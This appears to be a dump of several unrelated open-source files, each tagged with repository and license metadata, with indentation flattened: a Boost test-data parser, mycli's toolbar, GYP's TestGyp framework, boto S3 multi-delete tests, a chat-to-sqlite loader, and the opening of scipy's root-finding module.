'nccs.ipp',
'nct.ipp',
'negative_binomial_quantile.ipp',
'poisson_quantile.ipp',
'powm1_sqrtp1m1_test.cpp',
'sph_bessel_data.ipp',
'spherical_harmonic.ipp',
'sph_neumann_data.ipp',
#'test_bessel_i.cpp',
#'test_bessel_j.cpp',
#'test_bessel_k.cpp',
#'test_bessel_y.cpp',
# Those 3 files use arithmetic operations whithin the data, so we can't parse
# them naively
#'test_ellint_1.cpp',
#'test_ellint_2.cpp',
#'test_ellint_3.cpp',
'test_gamma_data.ipp',
'tgamma_delta_ratio_data.ipp',
'tgamma_delta_ratio_int2.ipp',
'tgamma_delta_ratio_int.ipp',
'tgamma_ratio_data.ipp',
'zeta_1_below_data.ipp',
'zeta_1_up_data.ipp',
'zeta_data.ipp',
'zeta_neg_data.ipp',
]
def _raw_data(line):
items = line.split(',')
l = []
for item in items:
m = ITEM_REGEX.search(item)
if m:
q = m.group(0)
l.append(q)
return l
def parse_ipp_file(filename):
print(filename)
a = open(filename, 'r')
lines = a.readlines()
data = {}
i = 0
while (i < len(lines)):
line = lines[i]
m = HEADER_REGEX.search(line)
if m:
d = int(m.group(1))
n = int(m.group(2))
print("d = {0}, n = {1}".format(d, n))
cdata = []
i += 1
line = lines[i]
# Skip comments
while CXX_COMMENT.match(line):
i += 1
line = lines[i]
while DATA_REGEX.match(line):
cdata.append(_raw_data(line))
i += 1
line = lines[i]
# Skip comments
while CXX_COMMENT.match(line):
i += 1
line = lines[i]
if not len(cdata) == n:
raise ValueError("parsed data: %d, expected %d" % (len(cdata), n))
data[m.group(3)] = cdata
else:
i += 1
return data
def dump_dataset(filename, data):
fid = open(filename, 'w')
try:
for line in data:
fid.write("%s\n" % " ".join(line))
finally:
fid.close()
def dump_datasets(filename):
base, ext = os.path.splitext(os.path.basename(filename))
base += '_%s' % ext[1:]
datadir = os.path.join(DATA_DIR, base)
os.makedirs(datadir)
datasets = parse_ipp_file(filename)
for k, d in datasets.items():
print(k, len(d))
dfilename = os.path.join(datadir, k) + '.txt'
dump_dataset(dfilename, d)
if __name__ == '__main__':
for filename in DATA_FILES:
filename = os.path.join(BOOST_SRC, filename)
print("================= %s ===============" % filename)
dump_datasets(filename)
| bsd-3-clause |
fw1121/mycli | mycli/clitoolbar.py | 27 | 1104 | from pygments.token import Token
def create_toolbar_tokens_func(get_key_bindings, token=None):
"""
Return a function that generates the toolbar tokens.
"""
assert callable(get_key_bindings)
token = token or Token.Toolbar
def get_toolbar_tokens(cli):
result = []
result.append((token, ' '))
if cli.buffers['default'].completer.smart_completion:
result.append((token.On, '[F2] Smart Completion: ON '))
else:
result.append((token.Off, '[F2] Smart Completion: OFF '))
if cli.buffers['default'].always_multiline:
result.append((token.On, '[F3] Multiline: ON '))
else:
result.append((token.Off, '[F3] Multiline: OFF '))
if cli.buffers['default'].always_multiline:
result.append((token,
' (Semi-colon [;] will end the line)'))
if get_key_bindings() == 'vi':
result.append((token.On, '[F4] Vi-mode'))
else:
result.append((token.On, '[F4] Emacs-mode'))
return result
return get_toolbar_tokens
| bsd-3-clause |
nawawi/wkhtmltopdf | webkit/Source/ThirdParty/gyp/test/lib/TestGyp.py | 12 | 25341 | #!/usr/bin/python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
TestGyp.py: a testing framework for GYP integration tests.
"""
import os
import re
import shutil
import stat
import sys
import TestCommon
from TestCommon import __all__
__all__.extend([
'TestGyp',
])
class TestGypBase(TestCommon.TestCommon):
"""
Class for controlling end-to-end tests of gyp generators.
Instantiating this class will create a temporary directory and
arrange for its destruction (via the TestCmd superclass) and
copy all of the non-gyptest files in the directory hierarchy of the
executing script.
The default behavior is to test the 'gyp' or 'gyp.bat' file in the
current directory. An alternative may be specified explicitly on
instantiation, or by setting the TESTGYP_GYP environment variable.
This class should be subclassed for each supported gyp generator
(format). Various abstract methods below define calling signatures
used by the test scripts to invoke builds on the generated build
configuration and to run executables generated by those builds.
"""
build_tool = None
build_tool_list = []
_exe = TestCommon.exe_suffix
_obj = TestCommon.obj_suffix
shobj_ = TestCommon.shobj_prefix
_shobj = TestCommon.shobj_suffix
lib_ = TestCommon.lib_prefix
_lib = TestCommon.lib_suffix
dll_ = TestCommon.dll_prefix
_dll = TestCommon.dll_suffix
# Constants to represent different targets.
ALL = '__all__'
DEFAULT = '__default__'
# Constants for different target types.
EXECUTABLE = '__executable__'
STATIC_LIB = '__static_lib__'
SHARED_LIB = '__shared_lib__'
def __init__(self, gyp=None, *args, **kw):
self.origin_cwd = os.path.abspath(os.path.dirname(sys.argv[0]))
if not gyp:
gyp = os.environ.get('TESTGYP_GYP')
if not gyp:
if sys.platform == 'win32':
gyp = 'gyp.bat'
else:
gyp = 'gyp'
self.gyp = os.path.abspath(gyp)
self.initialize_build_tool()
if not kw.has_key('match'):
kw['match'] = TestCommon.match_exact
if not kw.has_key('workdir'):
# Default behavior: the null string causes TestCmd to create
# a temporary directory for us.
kw['workdir'] = ''
formats = kw.get('formats', [])
if kw.has_key('formats'):
del kw['formats']
super(TestGypBase, self).__init__(*args, **kw)
excluded_formats = set([f for f in formats if f[0] == '!'])
included_formats = set(formats) - excluded_formats
if ('!'+self.format in excluded_formats or
included_formats and self.format not in included_formats):
msg = 'Invalid test for %r format; skipping test.\n'
self.skip_test(msg % self.format)
self.copy_test_configuration(self.origin_cwd, self.workdir)
self.set_configuration(None)
def built_file_must_exist(self, name, type=None, **kw):
"""
Fails the test if the specified built file name does not exist.
"""
return self.must_exist(self.built_file_path(name, type, **kw))
def built_file_must_not_exist(self, name, type=None, **kw):
"""
Fails the test if the specified built file name exists.
"""
return self.must_not_exist(self.built_file_path(name, type, **kw))
def built_file_must_match(self, name, contents, **kw):
"""
Fails the test if the contents of the specified built file name
do not match the specified contents.
"""
return self.must_match(self.built_file_path(name, **kw), contents)
def built_file_must_not_match(self, name, contents, **kw):
"""
Fails the test if the contents of the specified built file name
match the specified contents.
"""
return self.must_not_match(self.built_file_path(name, **kw), contents)
def copy_test_configuration(self, source_dir, dest_dir):
"""
Copies the test configuration from the specified source_dir
(the directory in which the test script lives) to the
specified dest_dir (a temporary working directory).
This ignores all files and directories that begin with
the string 'gyptest', and all '.svn' subdirectories.
"""
for root, dirs, files in os.walk(source_dir):
if '.svn' in dirs:
dirs.remove('.svn')
dirs = [ d for d in dirs if not d.startswith('gyptest') ]
files = [ f for f in files if not f.startswith('gyptest') ]
for dirname in dirs:
source = os.path.join(root, dirname)
destination = source.replace(source_dir, dest_dir)
os.mkdir(destination)
if sys.platform != 'win32':
shutil.copystat(source, destination)
for filename in files:
source = os.path.join(root, filename)
destination = source.replace(source_dir, dest_dir)
shutil.copy2(source, destination)
def initialize_build_tool(self):
"""
Initializes the .build_tool attribute.
Searches the .build_tool_list for an executable name on the user's
$PATH. The first tool on the list is used as-is if nothing is found
on the current $PATH.
"""
for build_tool in self.build_tool_list:
if not build_tool:
continue
if os.path.isabs(build_tool):
self.build_tool = build_tool
return
build_tool = self.where_is(build_tool)
if build_tool:
self.build_tool = build_tool
return
if self.build_tool_list:
self.build_tool = self.build_tool_list[0]
def relocate(self, source, destination):
"""
Renames (relocates) the specified source (usually a directory)
to the specified destination, creating the destination directory
first if necessary.
Note: Don't use this as a generic "rename" operation. In the
future, "relocating" parts of a GYP tree may affect the state of
the test to modify the behavior of later method calls.
"""
destination_dir = os.path.dirname(destination)
if not os.path.exists(destination_dir):
self.subdir(destination_dir)
os.rename(source, destination)
def report_not_up_to_date(self):
"""
Reports that a build is not up-to-date.
This provides common reporting for formats that have complicated
conditions for checking whether a build is up-to-date. Formats
that expect exact output from the command (make, scons) can
just set stdout= when they call the run_build() method.
"""
print "Build is not up-to-date:"
print self.banner('STDOUT ')
print self.stdout()
stderr = self.stderr()
if stderr:
print self.banner('STDERR ')
print stderr
def run_gyp(self, gyp_file, *args, **kw):
"""
Runs gyp against the specified gyp_file with the specified args.
"""
# TODO: --depth=. works around Chromium-specific tree climbing.
args = ('--depth=.', '--format='+self.format, gyp_file) + args
return self.run(program=self.gyp, arguments=args, **kw)
def run(self, *args, **kw):
"""
Executes a program by calling the superclass .run() method.
This exists to provide a common place to filter out keyword
arguments implemented in this layer, without having to update
the tool-specific subclasses or clutter the tests themselves
with platform-specific code.
"""
if kw.has_key('SYMROOT'):
del kw['SYMROOT']
super(TestGypBase, self).run(*args, **kw)
def set_configuration(self, configuration):
"""
Sets the configuration, to be used for invoking the build
tool and testing potential built output.
"""
self.configuration = configuration
def configuration_dirname(self):
if self.configuration:
return self.configuration.split('|')[0]
else:
return 'Default'
def configuration_buildname(self):
if self.configuration:
return self.configuration
else:
return 'Default'
#
# Abstract methods to be defined by format-specific subclasses.
#
def build(self, gyp_file, target=None, **kw):
"""
Runs a build of the specified target against the configuration
generated from the specified gyp_file.
A 'target' argument of None or the special value TestGyp.DEFAULT
specifies the default argument for the underlying build tool.
A 'target' argument of TestGyp.ALL specifies the 'all' target
(if any) of the underlying build tool.
"""
raise NotImplementedError
def built_file_path(self, name, type=None, **kw):
"""
Returns a path to the specified file name, of the specified type.
"""
raise NotImplementedError
def built_file_basename(self, name, type=None, **kw):
"""
Returns the base name of the specified file name, of the specified type.
A bare=True keyword argument specifies that prefixes and suffixes shouldn't
be applied.
"""
if not kw.get('bare'):
if type == self.EXECUTABLE:
name = name + self._exe
elif type == self.STATIC_LIB:
name = self.lib_ + name + self._lib
elif type == self.SHARED_LIB:
name = self.dll_ + name + self._dll
return name
def run_built_executable(self, name, *args, **kw):
"""
Runs an executable program built from a gyp-generated configuration.
The specified name should be independent of any particular generator.
Subclasses should find the output executable in the appropriate
output build directory, tack on any necessary executable suffix, etc.
"""
raise NotImplementedError
def up_to_date(self, gyp_file, target=None, **kw):
"""
Verifies that a build of the specified target is up to date.
The subclass should implement this by calling build()
(or a reasonable equivalent), checking whatever conditions
will tell it the build was an "up to date" null build, and
failing if it isn't.
"""
raise NotImplementedError
class TestGypGypd(TestGypBase):
"""
Subclass for testing the GYP 'gypd' generator (spit out the
internal data structure as pretty-printed Python).
"""
format = 'gypd'
class TestGypMake(TestGypBase):
"""
Subclass for testing the GYP Make generator.
"""
format = 'make'
build_tool_list = ['make']
ALL = 'all'
def build(self, gyp_file, target=None, **kw):
"""
Runs a Make build using the Makefiles generated from the specified
gyp_file.
"""
arguments = kw.get('arguments', [])[:]
if self.configuration:
arguments.append('BUILDTYPE=' + self.configuration)
if target not in (None, self.DEFAULT):
arguments.append(target)
# Sub-directory builds provide per-gyp Makefiles (i.e.
# Makefile.gyp_filename), so use that if there is no Makefile.
chdir = kw.get('chdir', '')
if not os.path.exists(os.path.join(chdir, 'Makefile')):
print "NO Makefile in " + os.path.join(chdir, 'Makefile')
arguments.insert(0, '-f')
arguments.insert(1, os.path.splitext(gyp_file)[0] + '.Makefile')
kw['arguments'] = arguments
return self.run(program=self.build_tool, **kw)
def up_to_date(self, gyp_file, target=None, **kw):
"""
Verifies that a build of the specified Make target is up to date.
"""
if target in (None, self.DEFAULT):
message_target = 'all'
else:
message_target = target
kw['stdout'] = "make: Nothing to be done for `%s'.\n" % message_target
return self.build(gyp_file, target, **kw)
def run_built_executable(self, name, *args, **kw):
"""
Runs an executable built by Make.
"""
configuration = self.configuration_dirname()
libdir = os.path.join('out', configuration, 'lib')
# TODO(piman): when everything is cross-compile safe, remove lib.target
os.environ['LD_LIBRARY_PATH'] = libdir + '.host:' + libdir + '.target'
# Enclosing the name in a list avoids prepending the original dir.
program = [self.built_file_path(name, type=self.EXECUTABLE, **kw)]
return self.run(program=program, *args, **kw)
def built_file_path(self, name, type=None, **kw):
"""
Returns a path to the specified file name, of the specified type,
as built by Make.
Built files are in the subdirectory 'out/{configuration}'.
The default is 'out/Default'.
A chdir= keyword argument specifies the source directory
relative to which the output subdirectory can be found.
"type" values of STATIC_LIB or SHARED_LIB append the necessary
prefixes and suffixes to a platform-independent library base name.
A libdir= keyword argument specifies a library subdirectory other
than the default 'obj.target'.
"""
result = []
chdir = kw.get('chdir')
if chdir:
result.append(chdir)
configuration = self.configuration_dirname()
result.extend(['out', configuration])
if type == self.STATIC_LIB:
result.append(kw.get('libdir', 'obj.target'))
elif type == self.SHARED_LIB:
result.append(kw.get('libdir', 'lib.target'))
result.append(self.built_file_basename(name, type, **kw))
return self.workpath(*result)
class TestGypMSVS(TestGypBase):
"""
Subclass for testing the GYP Visual Studio generator.
"""
format = 'msvs'
u = r'=== Build: (\d+) succeeded, 0 failed, (\d+) up-to-date, 0 skipped ==='
up_to_date_re = re.compile(u, re.M)
# Initial None element will indicate to our .initialize_build_tool()
# method below that 'devenv' was not found on %PATH%.
#
# Note: we must use devenv.com to be able to capture build output.
# Directly executing devenv.exe only sends output to BuildLog.htm.
build_tool_list = [None, 'devenv.com']
def initialize_build_tool(self):
""" Initializes the Visual Studio .build_tool and .uses_msbuild parameters.
We use the value specified by GYP_MSVS_VERSION. If not specified, we
search %PATH% and %PATHEXT% for a devenv.{exe,bat,...} executable.
Failing that, we search for likely deployment paths.
"""
super(TestGypMSVS, self).initialize_build_tool()
possible_roots = ['C:\\Program Files (x86)', 'C:\\Program Files']
possible_paths = {
'2010': r'Microsoft Visual Studio 10.0\Common7\IDE\devenv.com',
'2008': r'Microsoft Visual Studio 9.0\Common7\IDE\devenv.com',
'2005': r'Microsoft Visual Studio 8\Common7\IDE\devenv.com'}
msvs_version = os.environ.get('GYP_MSVS_VERSION', 'auto')
if msvs_version in possible_paths:
# Check that the path to the specified GYP_MSVS_VERSION exists.
path = possible_paths[msvs_version]
for r in possible_roots:
bt = os.path.join(r, path)
if os.path.exists(bt):
self.build_tool = bt
self.uses_msbuild = msvs_version >= '2010'
return
else:
print ('Warning: Environment variable GYP_MSVS_VERSION specifies "%s" '
'but corresponding "%s" was not found.' % (msvs_version, path))
if self.build_tool:
# We found 'devenv' on the path, use that and try to guess the version.
for version, path in possible_paths.iteritems():
if self.build_tool.find(path) >= 0:
self.uses_msbuild = version >= '2010'
return
else:
# If not, assume not MSBuild.
self.uses_msbuild = False
return
# Neither GYP_MSVS_VERSION nor the path help us out. Iterate through
# the choices looking for a match.
for version, path in possible_paths.iteritems():
for r in possible_roots:
bt = os.path.join(r, path)
if os.path.exists(bt):
self.build_tool = bt
self.uses_msbuild = msvs_version >= '2010'
return
print 'Error: could not find devenv'
sys.exit(1)
def build(self, gyp_file, target=None, rebuild=False, **kw):
"""
Runs a Visual Studio build using the configuration generated
from the specified gyp_file.
"""
configuration = self.configuration_buildname()
if rebuild:
build = '/Rebuild'
else:
build = '/Build'
arguments = kw.get('arguments', [])[:]
arguments.extend([gyp_file.replace('.gyp', '.sln'),
build, configuration])
# Note: the Visual Studio generator doesn't add an explicit 'all'
# target, so we just treat it the same as the default.
if target not in (None, self.ALL, self.DEFAULT):
arguments.extend(['/Project', target])
if self.configuration:
arguments.extend(['/ProjectConfig', self.configuration])
kw['arguments'] = arguments
return self.run(program=self.build_tool, **kw)
def up_to_date(self, gyp_file, target=None, **kw):
"""
Verifies that a build of the specified Visual Studio target is up to date.
"""
result = self.build(gyp_file, target, **kw)
if not result:
stdout = self.stdout()
m = self.up_to_date_re.search(stdout)
up_to_date = False
if m:
succeeded = m.group(1)
up_to_date = m.group(2)
up_to_date = succeeded == '0' and up_to_date == '1'
# Figuring out if the build is up to date changed with VS2010.
# For builds that should be up to date, I sometimes get
# "1 succeeded and 0 up to date". As an ad-hoc measure, we check
# this and also verify that th number of output lines is small.
# I don't know if this is caused by VS itself or is due to
# interaction with virus checkers.
if self.uses_msbuild and (succeeded == '1' and
up_to_date == '0' and
stdout.count('\n') <= 6):
up_to_date = True
if not up_to_date:
self.report_not_up_to_date()
self.fail_test()
return result
def run_built_executable(self, name, *args, **kw):
"""
Runs an executable built by Visual Studio.
"""
configuration = self.configuration_dirname()
# Enclosing the name in a list avoids prepending the original dir.
program = [self.built_file_path(name, type=self.EXECUTABLE, **kw)]
return self.run(program=program, *args, **kw)
def built_file_path(self, name, type=None, **kw):
"""
Returns a path to the specified file name, of the specified type,
as built by Visual Studio.
Built files are in a subdirectory that matches the configuration
name. The default is 'Default'.
A chdir= keyword argument specifies the source directory
relative to which the output subdirectory can be found.
"type" values of STATIC_LIB or SHARED_LIB append the necessary
prefixes and suffixes to a platform-independent library base name.
"""
result = []
chdir = kw.get('chdir')
if chdir:
result.append(chdir)
result.append(self.configuration_dirname())
if type == self.STATIC_LIB:
result.append('lib')
result.append(self.built_file_basename(name, type, **kw))
return self.workpath(*result)
class TestGypSCons(TestGypBase):
"""
Subclass for testing the GYP SCons generator.
"""
format = 'scons'
build_tool_list = ['scons', 'scons.py']
ALL = 'all'
def build(self, gyp_file, target=None, **kw):
"""
Runs a scons build using the SCons configuration generated from the
specified gyp_file.
"""
arguments = kw.get('arguments', [])[:]
dirname = os.path.dirname(gyp_file)
if dirname:
arguments.extend(['-C', dirname])
if self.configuration:
arguments.append('--mode=' + self.configuration)
if target not in (None, self.DEFAULT):
arguments.append(target)
kw['arguments'] = arguments
return self.run(program=self.build_tool, **kw)
def up_to_date(self, gyp_file, target=None, **kw):
"""
Verifies that a build of the specified SCons target is up to date.
"""
if target in (None, self.DEFAULT):
up_to_date_targets = 'all'
else:
up_to_date_targets = target
up_to_date_lines = []
for arg in up_to_date_targets.split():
up_to_date_lines.append("scons: `%s' is up to date.\n" % arg)
kw['stdout'] = ''.join(up_to_date_lines)
arguments = kw.get('arguments', [])[:]
arguments.append('-Q')
kw['arguments'] = arguments
return self.build(gyp_file, target, **kw)
def run_built_executable(self, name, *args, **kw):
"""
Runs an executable built by scons.
"""
configuration = self.configuration_dirname()
os.environ['LD_LIBRARY_PATH'] = os.path.join(configuration, 'lib')
# Enclosing the name in a list avoids prepending the original dir.
program = [self.built_file_path(name, type=self.EXECUTABLE, **kw)]
return self.run(program=program, *args, **kw)
def built_file_path(self, name, type=None, **kw):
"""
Returns a path to the specified file name, of the specified type,
as built by Scons.
Built files are in a subdirectory that matches the configuration
name. The default is 'Default'.
A chdir= keyword argument specifies the source directory
relative to which the output subdirectory can be found.
"type" values of STATIC_LIB or SHARED_LIB append the necessary
prefixes and suffixes to a platform-independent library base name.
"""
result = []
chdir = kw.get('chdir')
if chdir:
result.append(chdir)
result.append(self.configuration_dirname())
if type in (self.STATIC_LIB, self.SHARED_LIB):
result.append('lib')
result.append(self.built_file_basename(name, type, **kw))
return self.workpath(*result)
class TestGypXcode(TestGypBase):
"""
Subclass for testing the GYP Xcode generator.
"""
format = 'xcode'
build_tool_list = ['xcodebuild']
phase_script_execution = ("\n"
"PhaseScriptExecution /\\S+/Script-[0-9A-F]+\\.sh\n"
" cd /\\S+\n"
" /bin/sh -c /\\S+/Script-[0-9A-F]+\\.sh\n"
"(make: Nothing to be done for `all'\\.\n)?")
strip_up_to_date_expressions = [
# Various actions or rules can run even when the overall build target
# is up to date. Strip those phases' GYP-generated output.
re.compile(phase_script_execution, re.S),
# The message from distcc_pump can trail the "BUILD SUCCEEDED"
# message, so strip that, too.
re.compile('__________Shutting down distcc-pump include server\n', re.S),
]
up_to_date_endings = (
'Checking Dependencies...\n** BUILD SUCCEEDED **\n', # Xcode 3.0/3.1
'Check dependencies\n** BUILD SUCCEEDED **\n\n', # Xcode 3.2
)
def build(self, gyp_file, target=None, **kw):
"""
Runs an xcodebuild using the .xcodeproj generated from the specified
gyp_file.
"""
# Be sure we're working with a copy of 'arguments' since we modify it.
# The caller may not be expecting it to be modified.
arguments = kw.get('arguments', [])[:]
arguments.extend(['-project', gyp_file.replace('.gyp', '.xcodeproj')])
if target == self.ALL:
arguments.append('-alltargets',)
elif target not in (None, self.DEFAULT):
arguments.extend(['-target', target])
if self.configuration:
arguments.extend(['-configuration', self.configuration])
symroot = kw.get('SYMROOT', '$SRCROOT/build')
if symroot:
arguments.append('SYMROOT='+symroot)
kw['arguments'] = arguments
return self.run(program=self.build_tool, **kw)
def up_to_date(self, gyp_file, target=None, **kw):
"""
Verifies that a build of the specified Xcode target is up to date.
"""
result = self.build(gyp_file, target, **kw)
if not result:
output = self.stdout()
for expression in self.strip_up_to_date_expressions:
output = expression.sub('', output)
if not output.endswith(self.up_to_date_endings):
self.report_not_up_to_date()
self.fail_test()
return result
def run_built_executable(self, name, *args, **kw):
"""
Runs an executable built by xcodebuild.
"""
configuration = self.configuration_dirname()
os.environ['DYLD_LIBRARY_PATH'] = os.path.join('build', configuration)
# Enclosing the name in a list avoids prepending the original dir.
program = [self.built_file_path(name, type=self.EXECUTABLE, **kw)]
return self.run(program=program, *args, **kw)
def built_file_path(self, name, type=None, **kw):
"""
Returns a path to the specified file name, of the specified type,
as built by Xcode.
Built files are in the subdirectory 'build/{configuration}'.
The default is 'build/Default'.
A chdir= keyword argument specifies the source directory
relative to which the output subdirectory can be found.
"type" values of STATIC_LIB or SHARED_LIB append the necessary
prefixes and suffixes to a platform-independent library base name.
"""
result = []
chdir = kw.get('chdir')
if chdir:
result.append(chdir)
configuration = self.configuration_dirname()
result.extend(['build', configuration])
result.append(self.built_file_basename(name, type, **kw))
return self.workpath(*result)
format_class_list = [
TestGypGypd,
TestGypMake,
TestGypMSVS,
TestGypSCons,
TestGypXcode,
]
def TestGyp(*args, **kw):
"""
Returns an appropriate TestGyp* instance for a specified GYP format.
"""
format = kw.get('format')
if format:
del kw['format']
else:
format = os.environ.get('TESTGYP_FORMAT')
for format_class in format_class_list:
if format == format_class.format:
return format_class(*args, **kw)
raise Exception, "unknown format %r" % format
| lgpl-3.0 |
KaranToor/MA450 | google-cloud-sdk/.install/.backup/platform/gsutil/third_party/boto/tests/integration/s3/test_multidelete.py | 25 | 6770 | # -*- coding: utf-8 -*-
# Copyright (c) 2011 Mitch Garnaat http://garnaat.org/
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Some unit tests for the S3 MultiDelete
"""
import unittest
import time
from boto.s3.key import Key
from boto.s3.deletemarker import DeleteMarker
from boto.s3.prefix import Prefix
from boto.s3.connection import S3Connection
from boto.exception import S3ResponseError
class S3MultiDeleteTest(unittest.TestCase):
s3 = True
def setUp(self):
self.conn = S3Connection()
self.bucket_name = 'multidelete-%d' % int(time.time())
self.bucket = self.conn.create_bucket(self.bucket_name)
def tearDown(self):
for key in self.bucket:
key.delete()
self.bucket.delete_keys(self.bucket.list_versions())
self.bucket.delete()
def test_delete_nothing(self):
result = self.bucket.delete_keys([])
self.assertEqual(len(result.deleted), 0)
self.assertEqual(len(result.errors), 0)
def test_delete_illegal(self):
result = self.bucket.delete_keys([{"dict":"notallowed"}])
self.assertEqual(len(result.deleted), 0)
self.assertEqual(len(result.errors), 1)
def test_delete_mix(self):
result = self.bucket.delete_keys(["king",
("mice", None),
Key(name="regular"),
Key(),
Prefix(name="folder/"),
DeleteMarker(name="deleted"),
{"bad":"type"}])
self.assertEqual(len(result.deleted), 4)
self.assertEqual(len(result.errors), 3)
def test_delete_quietly(self):
result = self.bucket.delete_keys(["king"], quiet=True)
self.assertEqual(len(result.deleted), 0)
self.assertEqual(len(result.errors), 0)
def test_delete_must_escape(self):
result = self.bucket.delete_keys([Key(name=">_<;")])
self.assertEqual(len(result.deleted), 1)
self.assertEqual(len(result.errors), 0)
def test_delete_unknown_version(self):
no_ver = Key(name="no")
no_ver.version_id = "version"
result = self.bucket.delete_keys([no_ver])
self.assertEqual(len(result.deleted), 0)
self.assertEqual(len(result.errors), 1)
def test_delete_kanji(self):
result = self.bucket.delete_keys([u"漢字", Key(name=u"日本語")])
self.assertEqual(len(result.deleted), 2)
self.assertEqual(len(result.errors), 0)
def test_delete_empty_by_list(self):
result = self.bucket.delete_keys(self.bucket.list())
self.assertEqual(len(result.deleted), 0)
self.assertEqual(len(result.errors), 0)
def test_delete_kanji_by_list(self):
for key_name in [u"漢字", u"日本語", u"テスト"]:
key = self.bucket.new_key(key_name)
key.set_contents_from_string('this is a test')
result = self.bucket.delete_keys(self.bucket.list())
self.assertEqual(len(result.deleted), 3)
self.assertEqual(len(result.errors), 0)
def test_delete_with_prefixes(self):
for key_name in ["a", "a/b", "b"]:
key = self.bucket.new_key(key_name)
key.set_contents_from_string('this is a test')
# First delete all "files": "a" and "b"
result = self.bucket.delete_keys(self.bucket.list(delimiter="/"))
self.assertEqual(len(result.deleted), 2)
# Using delimiter will cause 1 common prefix to be listed
# which will be skipped as an error.
self.assertEqual(len(result.errors), 1)
self.assertEqual(result.errors[0].key, "a/")
# Next delete any remaining objects: "a/b"
result = self.bucket.delete_keys(self.bucket.list())
self.assertEqual(len(result.deleted), 1)
self.assertEqual(len(result.errors), 0)
self.assertEqual(result.deleted[0].key, "a/b")
def test_delete_too_many_versions(self):
# configure versioning first
self.bucket.configure_versioning(True)
# Add 1000 initial versions as DMs by deleting them :-)
# Adding 1000 objects is painful otherwise...
key_names = ['key-%03d' % i for i in range(0, 1000)]
result = self.bucket.delete_keys(key_names)
self.assertEqual(len(result.deleted) + len(result.errors), 1000)
# delete them again to create 1000 more delete markers
result = self.bucket.delete_keys(key_names)
self.assertEqual(len(result.deleted) + len(result.errors), 1000)
# Sometimes takes AWS sometime to settle
time.sleep(10)
# delete all versions to delete 2000 objects.
# this tests the 1000 limit.
result = self.bucket.delete_keys(self.bucket.list_versions())
self.assertEqual(len(result.deleted) + len(result.errors), 2000)
def test_1(self):
nkeys = 100
# create a bunch of keynames
key_names = ['key-%03d' % i for i in range(0, nkeys)]
# create the corresponding keys
for key_name in key_names:
key = self.bucket.new_key(key_name)
key.set_contents_from_string('this is a test')
# now count keys in bucket
n = 0
for key in self.bucket:
n += 1
self.assertEqual(n, nkeys)
# now delete them all
result = self.bucket.delete_keys(key_names)
self.assertEqual(len(result.deleted), nkeys)
self.assertEqual(len(result.errors), 0)
time.sleep(5)
# now count keys in bucket
n = 0
for key in self.bucket:
n += 1
self.assertEqual(n, 0)
| apache-2.0 |
andyoberlin/FacebookChatAnalysis | createMessagesDB.py | 1 | 1707 | import sqlite3
import json
from optparse import OptionParser
def makeSchema(db):
schemaFile = open('messages.sql', 'r')
schema = schemaFile.read()
schemaFile.close()
conn = sqlite3.connect(db)
cursor = conn.cursor()
cursor.executescript(schema)
cursor.close()
conn.close()
def loadMessages(messages):
messagesFile = open(messages, 'r')
result = messagesFile.read()
messagesFile.close()
return json.loads(result)
def addMessageToDB(message, db):
print message
name = message['from']['name'] if message.has_key('from') else 'UNKNOWN'
text = message['message'] if message.has_key('message') else 'NULL'
time = message['created_time']
# add the user for the message
conn = sqlite3.connect(db)
cursor = conn.cursor()
cursor.execute("INSERT OR IGNORE INTO friend(name) VALUES (?);", (name, ))
conn.commit()
userID = cursor.execute("SELECT id FROM friend WHERE name=?;", (name, )).fetchone()[0]
cursor.execute("INSERT OR IGNORE INTO message(sender, message, time) VALUES (?, ?, ?);",
(userID, text, time))
conn.commit()
cursor.close()
conn.close()
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-d", "--database", dest="database", default="messages.db", help="Filename for the sqlite3 database")
parser.add_option("-m", "--messages", dest="messages", default="messages.json", help="Filename for the messages in json")
(options, args) = parser.parse_args()
makeSchema(options.database)
messages = loadMessages(options.messages)
for message in messages:
addMessageToDB(message, options.database)
| apache-2.0 |
ales-erjavec/scipy | scipy/optimize/_root.py | 109 | 26007 | """
Unified interfaces to root finding algorithms.
Functions
---------
- root : find a root of a vector function.
"""
from __future__ import division, print_function, absolute_import
__all__ = ['root']
import numpy as np
from scipy._lib.six import callable
from warnings import warn
from .optimize import MemoizeJac, OptimizeResult, _check_unknown_options
from .minpack import _root_hybr, leastsq
from ._spectral import _root_df_sane
from . import nonlin
def root(fun, x0, args=(), method='hybr', jac=None, tol=None, callback=None,
options=None):
"""
Find a root of a vector function.
Parameters
----------
fun : callable
A vector function to find a root of.
x0 : ndarray
Initial guess.
args : tuple, optional
Extra arguments passed to the objective function and its Jacobian.
method : str, optional
Type of solver. Should be one of
- 'hybr' :ref:`(see here) <optimize.root-hybr>`
- 'lm' :ref:`(see here) <optimize.root-lm>`
- 'broyden1' :ref:`(see here) <optimize.root-broyden1>`
- 'broyden2' :ref:`(see here) <optimize.root-broyden2>`
- 'anderson' :ref:`(see here) <optimize.root-anderson>`
- 'linearmixing' :ref:`(see here) <optimize.root-linearmixing>`
- 'diagbroyden' :ref:`(see here) <optimize.root-diagbroyden>`
- 'excitingmixing' :ref:`(see here) <optimize.root-excitingmixing>`
- 'krylov' :ref:`(see here) <optimize.root-krylov>`
- 'df-sane' :ref:`(see here) <optimize.root-dfsane>`
jac : bool or callable, optional
If `jac` is a Boolean and is True, `fun` is assumed to return the
value of Jacobian along with the objective function. If False, the
Jacobian will be estimated numerically.
`jac` can also be a callable returning the Jacobian of `fun`. In
